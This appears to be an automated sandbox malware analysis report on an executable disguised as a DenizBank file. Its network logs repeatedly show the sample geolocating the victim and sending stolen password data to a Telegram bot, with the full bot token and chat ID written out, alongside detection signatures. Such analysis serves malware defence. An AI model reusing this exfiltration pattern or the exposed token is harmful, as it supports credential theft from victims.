Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50127 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50129 version: TLS 1.2

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: yGuK.pdb source: denizbank 25.11.2024 E80 aspc.exe
Source:	Binary string: yGuK.pdbSHA256 source: denizbank 25.11.2024 E80 aspc.exe

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 0723DA5Ah	0_2_0723E087
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 011AF45Dh	5_2_011AF2C0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 011AF45Dh	5_2_011AF52F
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 011AF45Dh	5_2_011AF4AC
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 011AFC19h	5_2_011AF961
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A10D0Dh	5_2_06A10B30
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A11697h	5_2_06A10B30
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A131E0h	5_2_06A12DC8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A12C19h	5_2_06A12968
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1E959h	5_2_06A1E6B0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1E0A9h	5_2_06A1DE00
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1E501h	5_2_06A1E258
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1F661h	5_2_06A1F3B8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1EDB1h	5_2_06A1EB08
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1F209h	5_2_06A1EF60
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1CF49h	5_2_06A1CCA0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1D3A1h	5_2_06A1D0F8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1FAB9h	5_2_06A1F810
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_06A10040
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1DC51h	5_2_06A1D9A8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A131E0h	5_2_06A12DC2
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A131E0h	5_2_06A1310E
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1D7F9h	5_2_06A1D550

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/11/2024%20/%2007:56:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e6439c8d8e7Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f9508ae93d4Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fc68a93853dHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ff6921c8f43Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1022a107cabdHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd104fc51b5f72Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd108a77d22bf7Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10bd7861d1e0Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10fdebe870d2Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd114312a04c68Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd119cdcf32feeHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11f54a4d3e32Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd123ed2feb5eaHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12d0c3219a48Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd135bb878f417Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd140d7a5ee1a3Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd14ac26879be1Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd182de5622be0Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd193474f36c09Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1b822ea7b891Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1c192e1ef1f1Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1e7018cadc20Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21292cee4675Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd86961858f128Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8ddcce5e6fa50baHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8ff950ef5a466fbHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49757 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49735 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/11/2024%20/%2007:56:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e6439c8d8e7Host: api.telegram.orgContent-Length: 580

Source: global traffic

